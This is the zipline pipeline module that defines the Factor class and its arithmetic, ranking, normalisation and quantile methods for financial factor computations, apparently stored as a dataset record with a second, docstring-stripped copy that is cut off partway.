from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
def coerce_numbers_to_my_dtype(f):
"""
A decorator for methods whose signature is f(self, other) that coerces
``other`` to ``self.dtype``.
This is used to make comparison operations between numbers and `Factor`
instances work independently of whether the user supplies a float or
integer literal.
For example, if I write::
my_filter = my_factor > 3
my_factor probably has dtype float64, but 3 is an int, so we want to coerce
to float64 before doing the comparison.
"""
@wraps(f)
def method(self, other):
if isinstance(other, Number):
other = coerce_to_dtype(self.dtype, other)
return f(self, other)
return method
@curry
def set_attribute(name, value):
"""
Decorator factory for setting attributes on a function.
Doesn't change the behavior of the wrapped function.
Usage
-----
>>> @set_attribute('__name__', 'foo')
... def bar():
... return 3
...
>>> bar()
3
>>> bar.__name__
'foo'
"""
def decorator(f):
setattr(f, name, value)
return f
return decorator
# Decorators for setting the __name__ and __doc__ properties of a decorated
# function.
# Example:
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
if is_comparison(op):
return NumExprFilter
else:
return NumExprFactor
def binop_return_dtype(op, left, right):
"""
Compute the expected return dtype for the given binary operator.
Parameters
----------
op : str
Operator symbol, (e.g. '+', '-', ...).
left : numpy.dtype
Dtype of left hand side.
right : numpy.dtype
Dtype of right hand side.
Returns
-------
outdtype : numpy.dtype
The dtype of the result of `left <op> right`.
"""
if is_comparison(op):
if left != right:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Comparisons are only supported between Factors of equal "
"dtypes.".format(left=left, op=op, right=right)
)
return bool_dtype
elif left != float64_dtype or right != float64_dtype:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Arithmetic operators are only supported between Factors of "
"dtype 'float64'.".format(
left=left.name,
op=op,
right=right.name,
)
)
return float64_dtype
def binary_operator(op):
"""
Factory function for making binary operator methods on a Factor subclass.
Returns a function, "binary_operator" suitable for implementing functions
like __add__.
"""
# When combining a Factor with a NumericalExpression, we use this
# attrgetter instance to defer to the commuted implementation of the
# NumericalExpression operator.
commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
@with_doc("Binary Operator: '%s'" % op)
@with_name(method_name_for_op(op))
@coerce_numbers_to_my_dtype
def binary_operator(self, other):
# This can't be hoisted up a scope because the types returned by
# binop_return_type aren't defined when the top-level function is
# invoked in the class body of Factor.
return_type = binop_return_type(op)
if isinstance(self, NumExprFactor):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other,
)
return return_type(
"({left}) {op} ({right})".format(
left=self_expr,
op=op,
right=other_expr,
),
new_inputs,
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, NumExprFactor):
# NumericalExpression overrides ops to correctly handle merging of
# inputs. Look up and call the appropriate reflected operator with
# ourself as the input.
return commuted_method_getter(other)(self)
elif isinstance(other, Term):
if self is other:
return return_type(
"x_0 {op} x_0".format(op=op),
(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
return return_type(
"x_0 {op} x_1".format(op=op),
(self, other),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, Number):
return return_type(
"x_0 {op} ({constant})".format(op=op, constant=other),
binds=(self,),
# .dtype access is safe here because coerce_numbers_to_my_dtype
# will convert any input numbers to numpy equivalents.
dtype=binop_return_dtype(op, self.dtype, other.dtype)
)
raise BadBinaryOperator(op, self, other)
return binary_operator
def reflected_binary_operator(op):
"""
Factory function for making binary operator methods on a Factor.
Returns a function, "reflected_binary_operator" suitable for implementing
functions like __radd__.
"""
assert not is_comparison(op)
@with_name(method_name_for_op(op, commute=True))
@coerce_numbers_to_my_dtype
def reflected_binary_operator(self, other):
if isinstance(self, NumericalExpression):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other
)
return NumExprFactor(
"({left}) {op} ({right})".format(
left=other_expr,
right=self_expr,
op=op,
),
new_inputs,
dtype=binop_return_dtype(op, other.dtype, self.dtype)
)
# Only have to handle the numeric case because in all other valid cases
# the corresponding left-binding method will be called.
elif isinstance(other, Number):
return NumExprFactor(
"{constant} {op} x_0".format(op=op, constant=other),
binds=(self,),
dtype=binop_return_dtype(op, other.dtype, self.dtype),
)
raise BadBinaryOperator(op, other, self)
return reflected_binary_operator
def unary_operator(op):
"""
Factory function for making unary operator methods for Factors.
"""
# Only negate is currently supported.
valid_ops = {'-'}
if op not in valid_ops:
raise ValueError("Invalid unary operator %s." % op)
@with_doc("Unary Operator: '%s'" % op)
@with_name(unary_op_name(op))
def unary_operator(self):
if self.dtype != float64_dtype:
raise TypeError(
"Can't apply unary operator {op!r} to instance of "
"{typename!r} with dtype {dtypename!r}.\n"
"{op!r} is only supported for Factors of dtype "
"'float64'.".format(
op=op,
typename=type(self).__name__,
dtypename=self.dtype.name,
)
)
# This can't be hoisted up a scope because the types returned by
# unary_op_return_type aren't defined when the top-level function is
# invoked.
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{op}({expr})".format(op=op, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{op}x_0".format(op=op),
(self,),
dtype=float64_dtype,
)
return unary_operator
def function_application(func):
"""
Factory function for producing function application methods for Factor
subclasses.
"""
if func not in NUMEXPR_MATH_FUNCS:
raise ValueError("Unsupported mathematical function '%s'" % func)
@with_name(func)
def mathfunc(self):
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{func}({expr})".format(func=func, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{func}(x_0)".format(func=func),
(self,),
dtype=float64_dtype,
)
return mathfunc
def restrict_to_dtype(dtype, message_template):
"""
A factory for decorators that restricting Factor methods to only be
callable on Factors with a specific dtype.
This is conceptually similar to
zipline.utils.input_validation.expect_dtypes, but provides more flexibility
for providing error messages that are specifically targeting Factor
methods.
Parameters
----------
dtype : numpy.dtype
The dtype on which the decorated method may be called.
message_template : str
A template for the error message to be raised.
`message_template.format` will be called with keyword arguments
`method_name`, `expected_dtype`, and `received_dtype`.
Usage
-----
@restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}."
"{method_name}() requires factors of dtype{expected_dtype}."
),
)
def some_factor_method(self, ...):
self.stuff_that_requires_being_float64(...)
"""
def processor(factor_method, _, factor_instance):
factor_dtype = factor_instance.dtype
if factor_dtype != dtype:
raise TypeError(
message_template.format(
method_name=factor_method.__name__,
expected_dtype=dtype.name,
received_dtype=factor_dtype,
)
)
return factor_instance
return preprocess(self=processor)
# Decorators for Factor methods.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}.\n"
"{method_name}() is only defined for dtype {expected_dtype}."
"To filter missing data, use isnull() or notnull()."
)
)
float64_only = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() is only defined on Factors of dtype {expected_dtype},"
" but it was called on a Factor of dtype {received_dtype}."
)
)
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
"""
Pipeline API expression producing a numerical or date-valued output.
Factors are the most commonly-used Pipeline term, representing the result
of any computation producing a numerical result.
Factors can be combined, both with other Factors and with scalar values,
via any of the builtin mathematical operators (``+``, ``-``, ``*``, etc).
This makes it easy to write complex expressions that combine multiple
Factors. For example, constructing a Factor that computes the average of
two other Factors is simply::
>>> f1 = SomeFactor(...)
>>> f2 = SomeOtherFactor(...)
>>> average = (f1 + f2) / 2.0
Factors can also be converted into :class:`zipline.pipeline.Filter` objects
via comparison operators: (``<``, ``<=``, ``!=``, ``eq``, ``>``, ``>=``).
There are many natural operators defined on Factors besides the basic
numerical operators. These include methods identifying missing or
extreme-valued outputs (isnull, notnull, isnan, notnan), methods for
normalizing outputs (rank, demean, zscore), and methods for constructing
Filters based on rank-order properties of results (top, bottom,
percentile_between).
"""
ALLOWED_DTYPES = FACTOR_DTYPES # Used by RestrictedDTypeMixin
# Dynamically add functions for creating NumExprFactor/NumExprFilter
# instances.
clsdict = locals()
clsdict.update(
{
method_name_for_op(op): binary_operator(op)
# Don't override __eq__ because it breaks comparisons on tuples of
# Factors.
for op in MATH_BINOPS.union(COMPARISONS - {'=='})
}
)
clsdict.update(
{
method_name_for_op(op, commute=True): reflected_binary_operator(op)
for op in MATH_BINOPS
}
)
clsdict.update(
{
unary_op_name(op): unary_operator(op)
for op in UNARY_OPS
}
)
clsdict.update(
{
funcname: function_application(funcname)
for funcname in NUMEXPR_MATH_FUNCS
}
)
__truediv__ = clsdict['__div__']
__rtruediv__ = clsdict['__rdiv__']
eq = binary_operator('==')
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def demean(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that computes ``self`` and subtracts the mean from
row of the result.
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means, and output NaN anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, de-meaning the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when computing means.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute means.
Example
-------
Let ``f`` be a Factor which would produce the following output::
AAPL MSFT MCD BK
2017-03-13 1.0 2.0 3.0 4.0
2017-03-14 1.5 2.5 3.5 1.0
2017-03-15 2.0 3.0 4.0 1.5
2017-03-16 2.5 3.5 1.0 2.0
Let ``c`` be a Classifier producing the following output::
AAPL MSFT MCD BK
2017-03-13 1 1 2 2
2017-03-14 1 1 2 2
2017-03-15 1 1 2 2
2017-03-16 1 1 2 2
Let ``m`` be a Filter producing the following output::
AAPL MSFT MCD BK
2017-03-13 False True True True
2017-03-14 True False True True
2017-03-15 True True False True
2017-03-16 True True True False
Then ``f.demean()`` will subtract the mean from each row produced by
``f``.
::
AAPL MSFT MCD BK
2017-03-13 -1.500 -0.500 0.500 1.500
2017-03-14 -0.625 0.375 1.375 -1.125
2017-03-15 -0.625 0.375 1.375 -1.125
2017-03-16 0.250 1.250 -1.250 -0.250
``f.demean(mask=m)`` will subtract the mean from each row, but means
will be calculated ignoring values on the diagonal, and NaNs will
written to the diagonal in the output. Diagonal values are ignored
because they are the locations where the mask ``m`` produced False.
::
AAPL MSFT MCD BK
2017-03-13 NaN -1.000 0.000 1.000
2017-03-14 -0.500 NaN 1.500 -1.000
2017-03-15 -0.166 0.833 NaN -0.666
2017-03-16 0.166 1.166 -1.333 NaN
``f.demean(groupby=c)`` will subtract the group-mean of AAPL/MSFT and
MCD/BK from their respective entries. The AAPL/MSFT are grouped
together because both assets always produce 1 in the output of the
classifier ``c``. Similarly, MCD/BK are grouped together because they
always produce 2.
::
AAPL MSFT MCD BK
2017-03-13 -0.500 0.500 -0.500 0.500
2017-03-14 -0.500 0.500 1.250 -1.250
2017-03-15 -0.500 0.500 1.250 -1.250
2017-03-16 -0.500 0.500 -0.500 0.500
``f.demean(mask=m, groupby=c)`` will also subtract the group-mean of
AAPL/MSFT and MCD/BK, but means will be calculated ignoring values on
the diagonal , and NaNs will be written to the diagonal in the output.
::
AAPL MSFT MCD BK
2017-03-13 NaN 0.000 -0.500 0.500
2017-03-14 0.000 NaN 1.250 -1.250
2017-03-15 -0.500 0.500 NaN 0.000
2017-03-16 -0.500 0.500 0.000 NaN
Notes
-----
Mean is sensitive to the magnitudes of outliers. When working with
factor that can potentially produce large outliers, it is often useful
to use the ``mask`` parameter to discard values at the extremes of the
distribution::
>>> base = MyFactor(...)
>>> normalized = base.demean(mask=base.percentile_between(1, 99))
``demean()`` is only supported on Factors of dtype float64.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def demean(row):
return row - nanmean(row)
return GroupedRowTransform(
transform=demean,
factor=self,
mask=mask,
groupby=groupby,
)
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def zscore(self, mask=NotSpecified, groupby=NotSpecified):
"""
Construct a Factor that Z-Scores each day's results.
The Z-Score of a row is defined as::
(row - row.mean()) / row.stddev()
If ``mask`` is supplied, ignore values where ``mask`` returns False
when computing row means and standard deviations, and output NaN
anywhere the mask is False.
If ``groupby`` is supplied, compute by partitioning each row based on
the values produced by ``groupby``, z-scoring the partitioned arrays,
and stitching the sub-results back together.
Parameters
----------
mask : zipline.pipeline.Filter, optional
A Filter defining values to ignore when Z-Scoring.
groupby : zipline.pipeline.Classifier, optional
A classifier defining partitions over which to compute Z-Scores.
Returns
-------
zscored : zipline.pipeline.Factor
A Factor producing that z-scores the output of self.
Notes
-----
Mean and standard deviation are sensitive to the magnitudes of
outliers. When working with factor that can potentially produce large
outliers, it is often useful to use the ``mask`` parameter to discard
values at the extremes of the distribution::
>>> base = MyFactor(...)
>>> normalized = base.zscore(mask=base.percentile_between(1, 99))
``zscore()`` is only supported on Factors of dtype float64.
Example
-------
See :meth:`~zipline.pipeline.factors.Factor.demean` for an in-depth
example of the semantics for ``mask`` and ``groupby``.
See Also
--------
:meth:`pandas.DataFrame.groupby`
"""
# This is a named function so that it has a __name__ for use in the
# graph repr of GroupedRowTransform.
def zscore(row):
return (row - nanmean(row)) / nanstd(row)
return GroupedRowTransform(
transform=zscore,
factor=self,
mask=mask,
groupby=groupby,
)
def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
"""
Construct a new Factor representing the sorted rank of each column
within each row.
Parameters
----------
method : str, {'ordinal', 'min', 'max', 'dense', 'average'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for
each ranking method. Default is 'ordinal'.
ascending : bool, optional
Whether to return sorted rank in ascending or descending order.
Default is True.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, ranks are computed ignoring any asset/date
pairs for which `mask` produces a value of False.
Returns
-------
ranks : zipline.pipeline.factors.Rank
A new factor that will compute the ranking of the data produced by
`self`.
Notes
-----
The default value for `method` is different from the default for
`scipy.stats.rankdata`. See that function's documentation for a full
description of the valid inputs to `method`.
Missing or non-existent data on a given day will cause an asset to be
given a rank of NaN for that day.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`zipline.pipeline.factors.factor.Rank`
"""
return Rank(self, method=method, ascending=ascending, mask=mask)
@expect_types(bins=int, mask=(Filter, NotSpecifiedType))
def quantiles(self, bins, mask=NotSpecified):
"""
Construct a Classifier computing quantiles of the output of ``self``.
Every non-NaN data point the output is labelled with an integer value
from 0 to (bins - 1). NaNs are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
bins : int
Number of bins labels to compute.
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quantiles.
Returns
-------
quantiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to (bins - 1).
"""
if mask is NotSpecified:
mask = self.mask
return Quantiles(inputs=(self,), bins=bins, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quartiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quartiles over the output of ``self``.
Every non-NaN data point the output is labelled with a value of either
0, 1, 2, or 3, corresponding to the first, second, third, or fourth
quartile over each row. NaN data points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quartiles.
Returns
-------
quartiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 3.
"""
return self.quantiles(bins=4, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quintiles(self, mask=NotSpecified):
"""
Construct a Classifier computing quintile labels on ``self``.
Every non-NaN data point the output is labelled with a value of either
0, 1, 2, or 3, 4, corresonding to quintiles over each row. NaN data
points are labelled with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing quintiles.
Returns
-------
quintiles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 4.
"""
return self.quantiles(bins=5, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def deciles(self, mask=NotSpecified):
"""
Construct a Classifier computing decile labels on ``self``.
Every non-NaN data point the output is labelled with a value from 0 to
9 corresonding to deciles over each row. NaN data points are labelled
with -1.
If ``mask`` is supplied, ignore data points in locations for which
``mask`` produces False, and emit a label of -1 at those locations.
Parameters
----------
mask : zipline.pipeline.Filter, optional
Mask of values to ignore when computing deciles.
Returns
-------
deciles : zipline.pipeline.classifiers.Quantiles
A Classifier producing integer labels ranging from 0 to 9.
"""
return self.quantiles(bins=10, mask=mask)
def top(self, N, mask=NotSpecified):
"""
Construct a Filter matching the top N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, top values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
return self.rank(ascending=False, mask=mask) <= N
def bottom(self, N, mask=NotSpecified):
"""
Construct a Filter matching the bottom N asset values of self each day.
Parameters
----------
N : int
Number of assets passing the returned filter each day.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when computing ranks.
If mask is supplied, bottom values are computed ignoring any
asset/date pairs for which `mask` produces a value of False.
Returns
-------
filter : zipline.pipeline.Filter
"""
return self.rank(ascending=True, mask=mask) <= N
def percentile_between(self,
min_percentile,
max_percentile,
mask=NotSpecified):
"""
Construct a new Filter representing entries from the output of this
Factor that fall within the percentile range defined by min_percentile
and max_percentile.
Parameters
----------
min_percentile : float [0.0, 100.0]
Return True for assets falling above this percentile in the data.
max_percentile : float [0.0, 100.0]
Return True for assets falling below this percentile in the data.
mask : zipline.pipeline.Filter, optional
A Filter representing assets to consider when percentile
calculating thresholds. If mask is supplied, percentile cutoffs
are computed each day using only assets for which ``mask`` returns
True. Assets for which ``mask`` produces False will produce False
in the output of this Factor as well.
Returns
-------
out : zipline.pipeline.filters.PercentileFilter
A new filter that will compute the specified percentile-range mask.
See Also
--------
zipline.pipeline.filters.filter.PercentileFilter
"""
return PercentileFilter(
self,
min_percentile=min_percentile,
max_percentile=max_percentile,
mask=mask,
)
def isnull(self):
"""
A Filter producing True for values where this Factor has missing data.
Equivalent to self.isnan() when ``self.dtype`` is float64.
Otherwise equivalent to ``self.eq(self.missing_value)``.
Returns
-------
filter : zipline.pipeline.filters.Filter
"""
if self.dtype == float64_dtype:
# Using isnan is more efficient when possible because we can fold
# the isnan computation with other NumExpr expressions.
return self.isnan()
else:
return NullFilter(self)
def notnull(self):
"""
A Filter producing True for values where this Factor has complete data.
Equivalent to ``~self.isnan()` when ``self.dtype`` is float64.
Otherwise equivalent to ``(self != self.missing_value)``.
"""
return ~self.isnull()
@if_not_float64_tell_caller_to_use_isnull
def isnan(self):
"""
A Filter producing True for all values where this Factor is NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return self != self
@if_not_float64_tell_caller_to_use_isnull
def notnan(self):
"""
A Filter producing True for values where this Factor is not NaN.
Returns
-------
nanfilter : zipline.pipeline.filters.Filter
"""
return ~self.isnan()
@if_not_float64_tell_caller_to_use_isnull
def isfinite(self):
"""
A Filter producing True for values where this Factor is anything but
NaN, inf, or -inf.
"""
return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
"""
Factor computed from a numexpr expression.
Parameters
----------
expr : string
A string suitable for passing to numexpr. All variables in 'expr'
should be of the form "x_i", where i is the index of the corresponding
factor input in 'binds'.
binds : tuple
A tuple of factors to use as inputs.
Notes
-----
NumExprFactors are constructed by numerical operators like `+` and `-`.
Users should rarely need to construct a NumExprFactor directly.
"""
pass
class GroupedRowTransform(Factor):
"""
A Factor that transforms an input factor by applying a row-wise
shape-preserving transformation on classifier-defined groups of that
Factor.
This is most often useful for normalization operators like ``zscore`` or
``demean``.
Parameters
----------
transform : function[ndarray[ndim=1] -> ndarray[ndim=1]]
Function to apply over each row group.
factor : zipline.pipeline.Factor
The factor providing baseline data to transform.
mask : zipline.pipeline.Filter
Mask of entries to ignore when calculating transforms.
groupby : zipline.pipeline.Classifier
Classifier partitioning ``factor`` into groups to use when calculating
means.
Notes
-----
Users should rarely construct instances of this factor directly. Instead,
they should construct instances via factor normalization methods like
``zscore`` and ``demean``.
See Also
--------
zipline.pipeline.factors.Factor.zscore
zipline.pipeline.factors.Factor.demean
"""
window_length = 0
def __new__(cls, transform, factor, mask, groupby):
if mask is NotSpecified:
mask = factor.mask
else:
mask = mask & factor.mask
if groupby is NotSpecified:
groupby = Everything(mask=mask)
return super(GroupedRowTransform, cls).__new__(
GroupedRowTransform,
transform=transform,
inputs=(factor, groupby),
missing_value=factor.missing_value,
mask=mask,
dtype=factor.dtype,
)
def _init(self, transform, *args, **kwargs):
self._transform = transform
return super(GroupedRowTransform, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, transform, *args, **kwargs):
return (
super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
transform,
)
def _compute(self, arrays, dates, assets, mask):
data = arrays[0]
null_group_value = self.inputs[1].missing_value
group_labels = where(
mask,
arrays[1],
null_group_value,
)
return where(
group_labels != null_group_value,
naive_grouped_rowwise_apply(
data=data,
group_labels=group_labels,
func=self._transform,
),
self.missing_value,
)
@property
def transform_name(self):
return self._transform.__name__
def short_repr(self):
return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
"""
A Factor representing the row-wise rank data of another Factor.
Parameters
----------
factor : zipline.pipeline.factors.Factor
The factor on which to compute ranks.
method : str, {'average', 'min', 'max', 'dense', 'ordinal'}
The method used to assign ranks to tied elements. See
`scipy.stats.rankdata` for a full description of the semantics for each
ranking method.
See Also
--------
:func:`scipy.stats.rankdata`
:class:`Factor.rank`
Notes
-----
Most users should call Factor.rank rather than directly construct an
instance of this class.
"""
window_length = 0
dtype = float64_dtype
def __new__(cls, factor, method, ascending, mask):
return super(Rank, cls).__new__(
cls,
inputs=(factor,),
method=method,
ascending=ascending,
mask=mask,
)
def _init(self, method, ascending, *args, **kwargs):
self._method = method
self._ascending = ascending
return super(Rank, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, method, ascending, *args, **kwargs):
return (
super(Rank, cls).static_identity(*args, **kwargs),
method,
ascending,
)
def _validate(self):
"""
Verify that the stored rank method is valid.
"""
if self._method not in _RANK_METHODS:
raise UnknownRankMethod(
method=self._method,
choices=set(_RANK_METHODS),
)
return super(Rank, self)._validate()
def _compute(self, arrays, dates, assets, mask):
"""
For each row in the input, compute a like-shaped array of per-row
ranks.
"""
return masked_rankdata_2d(
arrays[0],
mask,
self.inputs[0].missing_value,
self._method,
self._ascending,
)
def __repr__(self):
return "{type}({input_}, method='{method}', mask={mask})".format(
type=type(self).__name__,
input_=self.inputs[0],
method=self._method,
mask=self.mask,
)
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
'''
Base class for user-defined Factors.
Parameters
----------
inputs : iterable, optional
An iterable of `BoundColumn` instances (e.g. USEquityPricing.close),
describing the data to load and pass to `self.compute`. If this
argument is passed to the CustomFactor constructor, we look for a
class-level attribute named `inputs`.
window_length : int, optional
Number of rows to pass for each input. If this argument is not passed
to the CustomFactor constructor, we look for a class-level attribute
named `window_length`.
mask : zipline.pipeline.Filter, optional
A Filter describing the assets on which we should compute each day.
Each call to ``CustomFactor.compute`` will only receive assets for
which ``mask`` produced True on the day for which compute is being
called.
Notes
-----
Users implementing their own Factors should subclass CustomFactor and
implement a method named `compute` with the following signature:
.. code-block:: python
def compute(self, today, assets, out, *inputs):
...
On each simulation date, ``compute`` will be called with the current date,
an array of sids, an output array, and an input array for each expression
passed as inputs to the CustomFactor constructor.
The specific types of the values passed to `compute` are as follows::
today : np.datetime64[ns]
Row label for the last row of all arrays passed as `inputs`.
assets : np.array[int64, ndim=1]
Column labels for `out` and`inputs`.
out : np.array[self.dtype, ndim=1]
Output array of the same shape as `assets`. `compute` should write
its desired return values into `out`.
*inputs : tuple of np.array
Raw data arrays corresponding to the values of `self.inputs`.
``compute`` functions should expect to be passed NaN values for dates on
which no data was available for an asset. This may include dates on which
an asset did not yet exist.
For example, if a CustomFactor requires 10 rows of close price data, and
asset A started trading on Monday June 2nd, 2014, then on Tuesday, June
3rd, 2014, the column of input data for asset A will have 9 leading NaNs
for the preceding days on which data was not yet available.
Examples
--------
A CustomFactor with pre-declared defaults:
.. code-block:: python
class TenDayRange(CustomFactor):
"""
Computes the difference between the highest high in the last 10
days and the lowest low.
Pre-declares high and low as default inputs and `window_length` as
10.
"""
inputs = [USEquityPricing.high, USEquityPricing.low]
window_length = 10
def compute(self, today, assets, out, highs, lows):
from numpy import nanmin, nanmax
highest_highs = nanmax(highs, axis=0)
lowest_lows = nanmin(lows, axis=0)
out[:] = highest_highs - lowest_lows
# Doesn't require passing inputs or window_length because they're
# pre-declared as defaults for the TenDayRange class.
ten_day_range = TenDayRange()
A CustomFactor without defaults:
.. code-block:: python
class MedianValue(CustomFactor):
"""
Computes the median value of an arbitrary single input over an
arbitrary window..
Does not declare any defaults, so values for `window_length` and
`inputs` must be passed explicitly on every construction.
"""
def compute(self, today, assets, out, data):
from numpy import nanmedian
out[:] = data.nanmedian(data, axis=0)
# Values for `inputs` and `window_length` must be passed explicitly to
# MedianValue.
median_close10 = MedianValue([USEquityPricing.close], window_length=10)
median_low15 = MedianValue([USEquityPricing.low], window_length=15)
'''
dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
"""
Factor producing the most recently-known value of `inputs[0]` on each day.
The `.latest` attribute of DataSet columns returns an instance of this
Factor.
"""
window_length = 1
def compute(self, today, assets, out, data):
out[:] = data[-1]
| 33.506816
| 79
| 0.604026
|
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
def coerce_numbers_to_my_dtype(f):
@wraps(f)
def method(self, other):
if isinstance(other, Number):
other = coerce_to_dtype(self.dtype, other)
return f(self, other)
return method
@curry
def set_attribute(name, value):
def decorator(f):
setattr(f, name, value)
return f
return decorator
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
if is_comparison(op):
return NumExprFilter
else:
return NumExprFactor
def binop_return_dtype(op, left, right):
if is_comparison(op):
if left != right:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Comparisons are only supported between Factors of equal "
"dtypes.".format(left=left, op=op, right=right)
)
return bool_dtype
elif left != float64_dtype or right != float64_dtype:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Arithmetic operators are only supported between Factors of "
"dtype 'float64'.".format(
left=left.name,
op=op,
right=right.name,
)
)
return float64_dtype
def binary_operator(op):
commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
@with_doc("Binary Operator: '%s'" % op)
@with_name(method_name_for_op(op))
@coerce_numbers_to_my_dtype
def binary_operator(self, other):
# binop_return_type aren't defined when the top-level function is
return_type = binop_return_type(op)
if isinstance(self, NumExprFactor):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other,
)
return return_type(
"({left}) {op} ({right})".format(
left=self_expr,
op=op,
right=other_expr,
),
new_inputs,
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, NumExprFactor):
return commuted_method_getter(other)(self)
elif isinstance(other, Term):
if self is other:
return return_type(
"x_0 {op} x_0".format(op=op),
(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
return return_type(
